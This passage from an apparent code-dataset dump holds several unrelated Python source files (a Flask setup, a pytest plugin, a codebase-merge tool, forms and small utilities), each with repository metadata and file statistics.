fp.write('A %x:\n' % id(self))
MetaA = A
# Class initialization methods
| 18.830769 | 60 | 0.629085 | 157 | 1,224 | 4.726115 | 0.496815 | 0.037736 | 0.043127 | 0.061995 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001059 | 0.228758 | 1,224 | 64 | 61 | 19.125 | 0.784958 | 0.29902 | 0 | 0.064516 | 0 | 0 | 0.015171 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 1 | 0.225806 | false | 0.032258 | 0.16129 | 0 | 0.516129 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6487e1a1c4dfff87252067d989fbc85849af01b3 | 486 | py | Python | backend/app/__init__.py | Polsaker/mateapp | 8dfce3b642e8b7a68e74f22864aad8cee5b65239 | [
"MIT"
] | null | null | null | backend/app/__init__.py | Polsaker/mateapp | 8dfce3b642e8b7a68e74f22864aad8cee5b65239 | [
"MIT"
] | null | null | null | backend/app/__init__.py | Polsaker/mateapp | 8dfce3b642e8b7a68e74f22864aad8cee5b65239 | [
"MIT"
] | null | null | null | from flask import Flask, render_template, request
import sys
from .models import db_wrapper
from .views.token import token
from .common import JWT
try:
import config
except ImportError:
    print("ERROR: The configuration file does not exist!")
sys.exit(1)
app = Flask(__name__)
app.config.from_object('config')
# flaskdb initialization
db_wrapper.init_app(app)
JWT.init_app(app)
# Initialization of all blueprints
app.register_blueprint(token, url_prefix='/token') | 21.130435 | 58 | 0.773663 | 71 | 486 | 5.126761 | 0.577465 | 0.049451 | 0.054945 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002392 | 0.139918 | 486 | 23 | 59 | 21.130435 | 0.868421 | 0.127572 | 0 | 0 | 0 | 0 | 0.135071 | 0 | 0 | 0 | 0 | 0.043478 | 0 | 1 | 0 | false | 0 | 0.466667 | 0 | 0.466667 | 0.133333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
6489b2bf3f326b2bfc8410132de75ddbf7864318 | 1,059 | py | Python | conftest.py | fruch/pytest-shabang | b4a83386efebfedb415dcd7418cda77227cabc18 | [
"MIT"
] | null | null | null | conftest.py | fruch/pytest-shabang | b4a83386efebfedb415dcd7418cda77227cabc18 | [
"MIT"
] | null | null | null | conftest.py | fruch/pytest-shabang | b4a83386efebfedb415dcd7418cda77227cabc18 | [
"MIT"
] | null | null | null | import subprocess
import os.path
import sys
import pytest
def pytest_collect_file(parent, path):
if path.basename.startswith("test"):
return ShabangFile(path, parent)
class ShabangFile(pytest.File):
def collect(self):
yield ShabangItem(os.path.relpath(self.fspath), self, self.fspath)
class ShabangItem(pytest.Item):
def __init__(self, name, parent, filename):
super().__init__(name, parent)
self.filename = filename
def runtest(self):
subprocess.check_call(
str(self.filename), stdout=sys.stdout, stderr=sys.stderr, shell=True
)
def repr_failure(self, excinfo):
""" called when self.runtest() raises an exception. """
if isinstance(excinfo.value, subprocess.CalledProcessError):
return "\n".join(
[
"execution failed with",
" returncode: %r" % excinfo.value.returncode,
]
)
def reportinfo(self):
return self.fspath, 0, "file: %s" % self.name
| 26.475 | 80 | 0.609065 | 115 | 1,059 | 5.504348 | 0.486957 | 0.047393 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001311 | 0.279509 | 1,059 | 39 | 81 | 27.153846 | 0.828309 | 0.044381 | 0 | 0 | 0 | 0 | 0.051793 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.142857 | 0.035714 | 0.535714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
648e7a63b2bc50056b80cc23d240953bc125a6a5 | 735 | py | Python | marchena/modules/comments/managers.py | samuelmaudo/marchena | e9a522a9be66f7043aa61e316f7e733e8ccf1e32 | [
"BSD-3-Clause"
] | null | null | null | marchena/modules/comments/managers.py | samuelmaudo/marchena | e9a522a9be66f7043aa61e316f7e733e8ccf1e32 | [
"BSD-3-Clause"
] | null | null | null | marchena/modules/comments/managers.py | samuelmaudo/marchena | e9a522a9be66f7043aa61e316f7e733e8ccf1e32 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding:utf-8 -*-
from yepes.managers import (
NestableManager, NestableQuerySet,
SearchableManager, SearchableQuerySet,
)
class CommentQuerySet(NestableQuerySet, SearchableQuerySet):
"""
QuerySet providing main search functionality for ``CommentManager``.
"""
def published(self):
"""
Returns published comments.
"""
return self.filter(is_published=True)
class CommentManager(NestableManager, SearchableManager):
def get_queryset(self):
return CommentQuerySet(self.model, using=self._db)
def published(self, *args, **kwargs):
"""
Returns published comments.
"""
return self.get_queryset().published(*args, **kwargs)
| 22.96875 | 72 | 0.659864 | 64 | 735 | 7.515625 | 0.546875 | 0.049896 | 0.066528 | 0.12474 | 0.141372 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001761 | 0.227211 | 735 | 31 | 73 | 23.709677 | 0.84507 | 0.198639 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.083333 | 0.083333 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6490265ebc2725dd0511e1b8509201139db524c1 | 1,283 | py | Python | Mac/scripts/bgenall.py | deadsnakes/python2.3 | 0b4a6871ca57123c10aa48cc2a5d2b7c0ee3c849 | [
"PSF-2.0"
] | null | null | null | Mac/scripts/bgenall.py | deadsnakes/python2.3 | 0b4a6871ca57123c10aa48cc2a5d2b7c0ee3c849 | [
"PSF-2.0"
] | null | null | null | Mac/scripts/bgenall.py | deadsnakes/python2.3 | 0b4a6871ca57123c10aa48cc2a5d2b7c0ee3c849 | [
"PSF-2.0"
] | null | null | null | # bgenall - Generate all bgen-generated modules
#
import sys
import os
import string
def bgenone(dirname, shortname):
os.chdir(dirname)
print '%s:'%shortname
# Sigh, we don't want to lose CVS history, so two
# modules have funny names:
if shortname == 'carbonevt':
modulename = 'CarbonEvtscan'
elif shortname == 'ibcarbon':
modulename = 'IBCarbonscan'
else:
modulename = shortname + 'scan'
try:
m = __import__(modulename)
except:
print "Error:", shortname, sys.exc_info()[1]
return 0
try:
m.main()
except:
print "Error:", shortname, sys.exc_info()[1]
return 0
return 1
def main():
success = []
failure = []
sys.path.insert(0, os.curdir)
if len(sys.argv) > 1:
srcdir = sys.argv[1]
else:
srcdir = os.path.join(os.path.join(sys.prefix, 'Mac'), 'Modules')
srcdir = os.path.abspath(srcdir)
contents = os.listdir(srcdir)
for name in contents:
moduledir = os.path.join(srcdir, name)
scanmodule = os.path.join(moduledir, name +'scan.py')
if os.path.exists(scanmodule):
if bgenone(moduledir, name):
success.append(name)
else:
failure.append(name)
print 'Done:', string.join(success, ' ')
if failure:
print 'Failed:', string.join(failure, ' ')
return 0
return 1
if __name__ == '__main__':
rv = main()
sys.exit(not rv) | 22.910714 | 67 | 0.67576 | 179 | 1,283 | 4.765363 | 0.430168 | 0.042204 | 0.046893 | 0.058617 | 0.100821 | 0.100821 | 0.100821 | 0.100821 | 0.100821 | 0.100821 | 0 | 0.009479 | 0.177709 | 1,283 | 56 | 68 | 22.910714 | 0.799052 | 0.092751 | 0 | 0.285714 | 1 | 0 | 0.086207 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.081633 | null | null | 0.102041 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
64aad382a45a9aa9391b084a3435e00b657beb09 | 517 | py | Python | code/672.py | Nightwish-cn/my_leetcode | 40f206e346f3f734fb28f52b9cde0e0041436973 | [
"MIT"
] | 23 | 2020-03-30T05:44:56.000Z | 2021-09-04T16:00:57.000Z | code/672.py | Nightwish-cn/my_leetcode | 40f206e346f3f734fb28f52b9cde0e0041436973 | [
"MIT"
] | 1 | 2020-05-10T15:04:05.000Z | 2020-06-14T01:21:44.000Z | code/672.py | Nightwish-cn/my_leetcode | 40f206e346f3f734fb28f52b9cde0e0041436973 | [
"MIT"
] | 6 | 2020-03-30T05:45:04.000Z | 2020-08-13T10:01:39.000Z | class Solution:
def flipLights(self, n, m):
"""
:type n: int
:type m: int
:rtype: int
"""
if n == 1:
return 1 if m == 0 else 2
if m == 0:
return 1
elif m & 1:
if m == 1:
return 3 if n <= 2 else 4
else:
return 4 if n <= 2 else 8
else:
if m == 2:
return 4 if n <= 2 else 7
else:
return 4 if n <= 2 else 8 | 24.619048 | 41 | 0.34236 | 70 | 517 | 2.528571 | 0.3 | 0.084746 | 0.090395 | 0.180791 | 0.310734 | 0.310734 | 0.225989 | 0.225989 | 0 | 0 | 0 | 0.094595 | 0.5706 | 517 | 21 | 42 | 24.619048 | 0.702703 | 0.071567 | 0 | 0.3125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
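A quick check of the case analysis in `flipLights` above (the class is reproduced as written; the expected values follow LeetCode 672's enumeration of reachable light patterns):

```python
class Solution:
    def flipLights(self, n, m):
        # Same logic as above: only small n and m matter, because the
        # four buttons can generate at most 8 distinct patterns.
        if n == 1:
            return 1 if m == 0 else 2
        if m == 0:
            return 1
        elif m & 1:
            if m == 1:
                return 3 if n <= 2 else 4
            else:
                return 4 if n <= 2 else 8
        else:
            if m == 2:
                return 4 if n <= 2 else 7
            else:
                return 4 if n <= 2 else 8

s = Solution()
print(s.flipLights(1, 1))  # 2
print(s.flipLights(2, 1))  # 3
print(s.flipLights(3, 1))  # 4
```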
64ad8ccc5514d0a8420bc454f99b90d120b796a0 | 206 | py | Python | help/help.py | Veetaha/python-lab1-purse | bf8e2e941f0722357eab33ce35d0e5ef2bbcbeeb | [
"MIT"
] | null | null | null | help/help.py | Veetaha/python-lab1-purse | bf8e2e941f0722357eab33ce35d0e5ef2bbcbeeb | [
"MIT"
] | null | null | null | help/help.py | Veetaha/python-lab1-purse | bf8e2e941f0722357eab33ce35d0e5ef2bbcbeeb | [
"MIT"
] | null | null | null | from os import path, system, name
def clear():
"""
    Clear the console, regardless of the operating system
    :return: None
"""
if name == 'nt':
system('cls')
else:
system('clear')
| 15.846154 | 41 | 0.548544 | 23 | 206 | 4.913043 | 0.73913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.315534 | 206 | 12 | 42 | 17.166667 | 0.801418 | 0.271845 | 0 | 0 | 0 | 0 | 0.076923 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0 | 0.166667 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
64ba23b72324586717117191e5924bd71bb76399 | 492 | py | Python | database_setup.py | mantoshkumar1/scrapy-practice | aa533f2cb768d97e7eb1fce7243ba51d47e5e7c5 | [
"MIT"
] | null | null | null | database_setup.py | mantoshkumar1/scrapy-practice | aa533f2cb768d97e7eb1fce7243ba51d47e5e7c5 | [
"MIT"
] | 1 | 2022-03-02T14:54:11.000Z | 2022-03-02T14:54:11.000Z | database_setup.py | mantoshkumar1/scrapy-practice | aa533f2cb768d97e7eb1fce7243ba51d47e5e7c5 | [
"MIT"
] | null | null | null | from sqlalchemy import create_engine
from sqlalchemy.engine.url import URL
from models import DeclarativeBase
from scrapers import settings
# Performs database connection using database settings from settings.py
# Variable type of engine: sqlalchemy engine
engine = create_engine(URL(**settings.DATABASE), echo=True)
def create_quotes_table(engine):
""""""
DeclarativeBase.metadata.create_all(engine)
if __name__ == "__main__":
create_quotes_table(engine)
| 25.894737 | 72 | 0.762195 | 59 | 492 | 6.101695 | 0.474576 | 0.077778 | 0.094444 | 0.127778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164634 | 492 | 18 | 73 | 27.333333 | 0.875912 | 0.227642 | 0 | 0 | 0 | 0 | 0.022663 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.444444 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
64c0972a1041309f76b4ed0085ed1b63f3b538e3 | 212 | py | Python | lib/python/euler/fibonacci.py | xfbs/ProjectEulerRust | e26768c56ff87b029cb2a02f56dc5cd32e1f7c87 | [
"MIT"
] | 1 | 2018-01-26T21:18:12.000Z | 2018-01-26T21:18:12.000Z | lib/python/euler/fibonacci.py | xfbs/ProjectEulerRust | e26768c56ff87b029cb2a02f56dc5cd32e1f7c87 | [
"MIT"
] | 3 | 2017-12-09T14:49:30.000Z | 2017-12-09T14:59:39.000Z | lib/python/euler/fibonacci.py | xfbs/ProjectEulerRust | e26768c56ff87b029cb2a02f56dc5cd32e1f7c87 | [
"MIT"
] | null | null | null | import math
# phi - the golden ratio
PHI = (1 + math.sqrt(5)) / 2
# the root of five, we need this a lot
ROOT5 = math.sqrt(5)
# returns the nth fibonacci number
def nth(n):
return round((PHI**n) / ROOT5)
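As a sanity check (not part of the original module), the closed-form `nth` above agrees with a plain iterative Fibonacci for small `n`; floating-point error only breaks the rounding trick once `n` grows past roughly 70:

```python
import math

PHI = (1 + math.sqrt(5)) / 2   # golden ratio
ROOT5 = math.sqrt(5)

def nth(n):
    # Binet's formula, rounded to the nearest integer.
    return round((PHI**n) / ROOT5)

def nth_iter(n):
    # Reference implementation by straightforward iteration.
    a, b = 0, 1
    for _ in range(n):
        a, b = b, a + b
    return a

print(all(nth(n) == nth_iter(n) for n in range(30)))  # True
```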
| 16.307692 | 38 | 0.650943 | 38 | 212 | 3.631579 | 0.710526 | 0.115942 | 0.130435 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036364 | 0.221698 | 212 | 12 | 39 | 17.666667 | 0.8 | 0.438679 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.2 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
64c55a7d52cabc1c805230ca7439bdb0a588dbf9 | 8,580 | py | Python | moe/merge_codebases.py | cgruber/make-open-easy | b433ba61d2f7b32d06eb7df8db38ba545827ad5e | [
"Apache-2.0"
] | 5 | 2016-05-08T00:55:46.000Z | 2020-03-14T06:57:30.000Z | moe/merge_codebases.py | cgruber/make-open-easy | b433ba61d2f7b32d06eb7df8db38ba545827ad5e | [
"Apache-2.0"
] | null | null | null | moe/merge_codebases.py | cgruber/make-open-easy | b433ba61d2f7b32d06eb7df8db38ba545827ad5e | [
"Apache-2.0"
] | 10 | 2015-06-08T21:15:13.000Z | 2021-10-16T15:06:01.000Z | #!/usr/bin/env python
# Copyright 2010 Google Inc. All Rights Reserved.
"""Merges codebases.
When a change is made to either the generated or public codebase, and you want
to fold that into the other, you want to bring in that change, but *not* the
changes that made them different codebases to begin with. This is merging
the codebases. Merging takes a previous codebase, and the two current codebases
(generated and public), and creates the merged codebase. If the previous
codebase is public, the merged will be generated, and vice versa.
Usage:
merge_codebases --generated_codebase=<DIR>
--previous_codebase=<DIR> --public_codebase=<DIR>
Codebases may be either a directory, or a .tar or .zip file containing
the codebase.
Returns non-zero if unsuccessful merges.
"""
__author__ = 'dbentley@google.com (Dan Bentley)'
import os
import shutil
import subprocess
import sys
import tempfile
from google.apputils import app
import gflags as flags
import logging
from moe import base
from moe import moe_app
FLAGS = flags.FLAGS
class MergeCodebasesConfig(object):
"""Configuration to use for an examination of codebases."""
def __init__(
self,
generated_codebase, public_codebase,
previous_codebase):
"""Construct.
Args:
generated_codebase: codebase_utils.Codebase
public_codebase: codebase_utils.Codebase
previous_codebase: codebase_utils.Codebase
"""
self.generated_codebase = generated_codebase
self.public_codebase = public_codebase
self.previous_codebase = previous_codebase
self._Check()
def _Check(self):
"""Perform argument checking and expansion."""
if not self.generated_codebase:
raise app.UsageError('generated_codebase not set')
if not self.public_codebase:
raise app.UsageError('public_codebase not set')
if not self.previous_codebase:
raise app.UsageError('previous_codebase not set')
self.merged_codebase = tempfile.mkdtemp(
dir=moe_app.RUN.temp_dir, prefix='merged_codebase')
print ('Writing merged codebase to %s' %
self.merged_codebase)
class MergeCodebasesContext(object):
"""Context to examine codebases."""
def __init__(self, config):
"""Initialize MergeCodebasesContext.
Args:
config: MergeCodebasesConfig, configuration
"""
self.config = config
self.files = []
self.merged_files = []
self.failed_merges = []
def GenerateFiles(self):
"""Determine all the files to examine."""
file_list = []
file_set = set()
generated_files = self.config.generated_codebase.Walk()
for generated_file in generated_files:
file_list.append(generated_file)
file_set.add(generated_file)
public_files = self.config.public_codebase.Walk()
for public_file in public_files:
if public_file in file_set:
continue
file_list.append(public_file)
return file_list
def Update(self):
"""Entry point to examine codebases."""
files_to_merge = self.GenerateFiles()
self.files = files_to_merge
print 'COMPARING %d FILES:' % len(self.files)
print ' Generated Codebase: ', self.config.generated_codebase.Path()
print ' Public Codebase: ', self.config.public_codebase.Path()
print ' Previous Codebase: ', self.config.previous_codebase.Path()
print ' Merged Codebase:', self.config.merged_codebase
for f in files_to_merge:
self.GenerateMergedFile(f)
sys.stdout.write('\n')
sys.stdout.flush()
self.Report()
return bool(self.failed_merges)
def Report(self):
"""Print the final report."""
print ('Examined %d generated/public/previous files.' %
len(self.files))
if self.merged_files:
print ('%d required updating. First (up to) 10:' %
len(self.merged_files))
for f in self.merged_files[:10]:
print ' ', f
if self.failed_merges:
print ('%d were unsuccessful. First (up to) 5:' %
len(self.failed_merges))
for f in self.failed_merges[:5]:
print ' ', f
else:
print 'No merges required'
def GenerateMergedFile(self, f):
"""Generate the merged file for f."""
sys.stdout.write('.')
sys.stdout.flush()
generated_file = self.config.generated_codebase.FilePath(f)
public_file = self.config.public_codebase.FilePath(f)
previous_file = self.config.previous_codebase.FilePath(f)
merged_file = os.path.join(self.config.merged_codebase, f)
base.MakeDir(os.path.dirname(merged_file))
different = base.AreFilesDifferent(generated_file, public_file)
if not different:
shutil.copyfile(public_file, merged_file)
if base.IsExecutable(public_file):
base.SetExecutable(merged_file)
return
# TODO(dbentley): I probably need to think about executability
# So far, I've handled it in push_codebase but not here at all.
# This is probably a bug.
self.PerformMerge(public_file, previous_file, generated_file,
merged_file, f)
self.merged_files.append(f)
def PerformMerge(self, mod1_file, orig_file, mod2_file, output_file, f):
"""Merge changes.
Args:
mod1_file: str, path to the first modified file
orig_file: str, path to the original file
mod2_file: str, path to the second modified file
output_file: str, path to a file to write the file to.
f: str, relative filename of file being merged
Raises:
base.Error: if neither mod1_file nor mod2_file exists.
"""
# First, we deal with merging deleted files.
# merge(1) does not deal with this.
orig_exists = os.path.exists(orig_file)
mod1_exists = os.path.exists(mod1_file)
mod2_exists = os.path.exists(mod2_file)
orig_file = (orig_exists and orig_file) or '/dev/null'
mod1_file = (mod1_exists and mod1_file) or '/dev/null'
mod2_file = (mod2_exists and mod2_file) or '/dev/null'
if not (mod1_exists or mod2_exists):
raise base.Error('Neither %s nor %s exists' % (mod1_file, mod2_file))
if not orig_exists:
# the file was added
pass
else:
if not (mod1_exists and mod2_exists):
# the file previously existed, and now was deleted in one branch
existing_file = (mod1_exists and mod1_file) or mod2_file
if base.AreFilesDifferent(existing_file, orig_file):
# one branch wants to delete; another to modify.
# This is a failed merge. We note that it's a failed merge, and let
# it continue. This will call merge(1) with the previous file,
# an empty file, and the current, existing, modified file. This will
# create a merge error that we want, so the user can fix it.
self.failed_merges.append(f)
else:
# we want to delete the file; so we just don't output it
return
# NB(dbentley): merge takes the original file in the middle. Yes it looks
# weird, but it is correct.
process = subprocess.Popen(['merge', '-p', mod1_file, orig_file, mod2_file],
stdout=open(output_file, 'wb'))
# Handle executable bit
orig_exec = base.IsExecutable(orig_file)
mod1_exec = base.IsExecutable(mod1_file)
mod2_exec = base.IsExecutable(mod2_file)
if mod1_exec == mod2_exec:
output_exec = mod1_exec
else:
# This is clever. Explanation:
# The executable bits of the modified files differ.
# We should pick the one that differs from the original.
# Because these are booleans, we get that by negating the original.
output_exec = not orig_exec
if output_exec:
base.SetExecutable(output_file)
# From merge(1)'s man page:
# Exit status is 0 for no conflicts, 1 for some conflicts, 2 for trouble.
process.wait()
if process.returncode != 0:
self.failed_merges.append(f)
if process.returncode == 1:
logging.error('FAILED MERGE %s', output_file)
logging.debug(
'FAILED MERGE command: merge -p %s %s %s',
mod1_file, orig_file, mod2_file)
elif process.returncode == 2:
      logging.error('Merge found "trouble" when merging: %s %s %s',
                    mod1_file, orig_file, mod2_file)
elif process.returncode != 0:
logging.error('Merge returned status %d (outside of 0, 1, 2).',
process.returncode)
def main(unused_args):
print 'merge_codebases has no standalone mode'
print 'email moe-team@ if this is a problem'
sys.exit(1)
if __name__ == '__main__':
app.run()
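The executable-bit rule in `PerformMerge` above ("pick the side that differs from the original") reduces to a small boolean function; this illustrative check, not part of the original module, enumerates the interesting cases:

```python
def merged_exec(orig_exec, mod1_exec, mod2_exec):
    # If both modified sides agree, keep their shared value; if they
    # disagree, exactly one side flipped the bit, and the flipped
    # value is by definition the negation of the original.
    if mod1_exec == mod2_exec:
        return mod1_exec
    return not orig_exec

# One side made the file executable -> the merge keeps it executable.
print(merged_exec(False, True, False))  # True
# One side stripped the executable bit -> the merge drops it.
print(merged_exec(True, False, True))   # False
```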
| 33.255814 | 80 | 0.679371 | 1,166 | 8,580 | 4.845626 | 0.245283 | 0.029735 | 0.019823 | 0.011327 | 0.059823 | 0.043186 | 0.026549 | 0.016991 | 0.016991 | 0.016991 | 0 | 0.0094 | 0.231235 | 8,580 | 257 | 81 | 33.385214 | 0.84718 | 0.133683 | 0 | 0.082192 | 1 | 0 | 0.12039 | 0.004349 | 0 | 0 | 0 | 0.003891 | 0 | 0 | null | null | 0.006849 | 0.068493 | null | null | 0.09589 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
64c83e170e74fdce7a961bc2d36cb3f925975895 | 2,018 | py | Python | app/forms/new_appointment.py | datascisteven/Queens-VA-SMS-Reminder-Project | 9dde2852a8fa63d150d9a4c610b9f8d57f7dbc19 | [
"Apache-2.0"
] | 1 | 2022-01-22T06:33:38.000Z | 2022-01-22T06:33:38.000Z | app/forms/new_appointment.py | datascisteven/Queens-VA-SMS-Reminder-Project | 9dde2852a8fa63d150d9a4c610b9f8d57f7dbc19 | [
"Apache-2.0"
] | null | null | null | app/forms/new_appointment.py | datascisteven/Queens-VA-SMS-Reminder-Project | 9dde2852a8fa63d150d9a4c610b9f8d57f7dbc19 | [
"Apache-2.0"
] | 1 | 2022-01-22T06:33:50.000Z | 2022-01-22T06:33:50.000Z | from flask_wtf import FlaskForm
from wtforms import StringField, DateTimeField, SelectField
from wtforms.validators import DataRequired, Length
from pytz import common_timezones
def _timezones():
return [(tz, tz) for tz in common_timezones][::-1]
# event_types = [('booked', 'Booked'),
# ('rescheduled', 'Rescheduled'),
# ('modified', 'Modified'),
# ('noshowed', 'No-Showed'),
# ('cancelled', 'Cancelled'),
# ('confirmed', 'Confirmed')]
times = ['0.25', '0.5', '1', '2', '12', '24', '48', '168']
def _intervals():
return [(hr, hr + ' hours') for hr in times]
class NewAppointmentForm(FlaskForm):
# event_type = SelectField(
# 'Event Type', choices=event_types, validators=[DataRequired()], default='booked'
# )
# event_time = DateTimeField(
# 'Appointment time', validators=[DataRequired()], format="%m-%d-%Y %I:%M%p", default=utcnow
# )
# patient_id = IntegerField('Patient ID', validators=[DataRequired(), Length(min=6)])
first = StringField(
'Patient First Name', validators=[DataRequired()])
last = StringField(
'Patient Last Name', validators=[DataRequired()])
mobile = StringField(
'Patient Mobile Number', validators=[DataRequired(), Length(min=10)])
# provider_id = IntegerField('Provider ID', validators=[DataRequired(), Length(min=6)])
dr_first = StringField(
'Provider First Name', validators=[DataRequired()])
dr_last = StringField(
'Provider Last Name', validators=[DataRequired()])
location = StringField(
'Appointment Location', validators=[DataRequired()])
interval = SelectField(
        'Reminder Interval', choices=_intervals(), validators=[DataRequired()], default='48')
time = DateTimeField(
'Appointment Time', validators=[DataRequired()], format="%m-%d-%Y %I:%M%p")
timezone = SelectField(
'Appointment Timezone', choices=_timezones(), validators=[DataRequired()])
| 39.568627 | 100 | 0.633796 | 197 | 2,018 | 6.416244 | 0.375635 | 0.226266 | 0.082278 | 0.073576 | 0.158228 | 0.158228 | 0.10443 | 0.10443 | 0.10443 | 0.10443 | 0 | 0.014357 | 0.206145 | 2,018 | 50 | 101 | 40.36 | 0.774657 | 0.327056 | 0 | 0 | 0 | 0 | 0.153617 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.142857 | 0.071429 | 0.642857 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
64cba2f808f8129c5468822e716a045ca39e7b2a | 793 | py | Python | torchlight/modules/metrics.py | l3robot/torchlight | e9a809aad0b5e75f97bf0cb50c9c799ea7b98eab | [
"MIT"
] | null | null | null | torchlight/modules/metrics.py | l3robot/torchlight | e9a809aad0b5e75f97bf0cb50c9c799ea7b98eab | [
"MIT"
] | null | null | null | torchlight/modules/metrics.py | l3robot/torchlight | e9a809aad0b5e75f97bf0cb50c9c799ea7b98eab | [
"MIT"
] | null | null | null | import abc
import numpy as np
from sklearn.metrics import accuracy_score
class BaseMetric():
def __init__(self):
self.preds = []
self.targets = []
def append(self, preds, targets):
self.preds.extend(preds.data.cpu().numpy())
self.targets.extend(targets.data.cpu().numpy())
def reset(self):
self.preds = []
self.targets = []
def show(self):
return '{}: {:.4f}'.format(self.name, self.compute())
@abc.abstractmethod
def compute(self):
raise NotImplementedError
class AccuracyScore(BaseMetric):
def __init__(self):
super().__init__()
self.name = 'accuracy'
def compute(self):
preds = np.argmax(self.preds, axis=1)
return accuracy_score(preds, self.targets) | 21.432432 | 61 | 0.611602 | 91 | 793 | 5.175824 | 0.395604 | 0.11465 | 0.101911 | 0.089172 | 0.11465 | 0.11465 | 0 | 0 | 0 | 0 | 0 | 0.003378 | 0.253468 | 793 | 37 | 62 | 21.432432 | 0.79223 | 0 | 0 | 0.32 | 0 | 0 | 0.02267 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.28 | false | 0 | 0.12 | 0.04 | 0.56 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
b38ecd7c827d0395c200b4b2390413050257cd1c | 599 | py | Python | Exercises/Blackjack/player.py | Gwarglemar/PythonExercises | 3261892dea4d51b320cde2ce8a47e67a67609d30 | [
"MIT"
